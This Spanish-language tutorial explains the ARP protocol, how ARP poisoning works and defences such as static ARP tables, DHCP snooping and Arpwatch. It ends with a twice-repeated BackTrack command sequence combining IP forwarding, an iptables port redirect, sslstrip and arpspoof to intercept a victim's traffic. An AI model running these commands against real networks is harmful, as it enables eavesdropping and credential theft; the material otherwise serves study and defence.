Protocolo ARP
ARP es un protocolo de la capa 2 enlace. El protocolo ARP será el encargado de obtener las direcciones físicas MAC a partir de direcciones IP. En este tipo de redes es necesario conocer la MAC del destino con el fin de que solo el paquete llegue al interfaz de red correspondiente y no a otro.
Como observamos, el concepto de ARP solo cobra sentido si nos encontramos en el ámbito de redes conmutadas, pues de lo contrario no sería necesario conocer la MAC del destino dentro de la red.
Envenenamiento ARP
El Envenenamiento ARP, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red LAN.
¿Cómo Actúa?
El principio el envenenamiento ARP es enviar mensajes ARP falsos ( spoofed) a la Ethernet. Normalmente la finalidad es asociar la dirección MAC del atacante con la dirección IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway). Cualquier tráfico dirigido a la dirección IP de ese nodo, será erróneamente enviado al atacante, en lugar de a su destino real. El atacante, puede entonces elegir, entre reenviar el tráfico a la puerta de enlace predeterminada real (ataque pasivo o escucha), o modificar los datos antes de reenviarlos (ataque activo). El atacante puede incluso lanzar un ataque de tipo DoS (Denegación de Servicio) contra una víctima, asociando una dirección MAC inexistente con la dirección IP de la puerta de enlace predeterminada de la víctima.
Métodos de defensa
- Un método para prevenir el ARP Spoofing, es el uso de tablas ARP estáticas, es decir añadir entradas estáticas ARP, de forma que no existe caché dinámica, cada entrada de la tabla mapea una dirección MAC con su correspondiente dirección IP. Sin embargo, esta no es una solución práctica, sobre todo en redes grandes.
- En grandes redes es preferible usar otro método: el DHCP snooping. Mediante DHCP, el dispositivo de red mantiene un registro de las direcciones MAC que están conectadas a cada puerto, de modo que rápidamente detecta si se recibe una suplantación ARP. Este método es implementado en el equipamiento de red de fabricantes como Cisco, Extreme Networks y Allied Telesis.
- Arpwatch es un programa Unix que escucha respuestas ARP en la red, y envía una notificación vía email al administrador de la red, cuando una entrada ARP cambia.
- RARP (“Reverse ARP”, o ARP inverso) es el protocolo usado para consultar, a partir de una dirección MAC, su dirección IP correspondiente. Si ante una consulta, RARP devuelve más de una dirección IP, significa que esa dirección MAC ha sido clonada.
Video Tutorial:
Comandos Back|Track :
echo 1> /proc/sys/net/ipv4/ip_forward
iptable -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -l 1000 /otra ventana
tail -f sslstrip.log
arpspoof -i wlan0 -t IP - Puerta enlace
echo 1> /proc/sys/net/ipv4/ip_forward
iptable -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -l 1000 /otra ventana
tail -f sslstrip.log
arpspoof -i wlan0 -t IP - Puerta enlace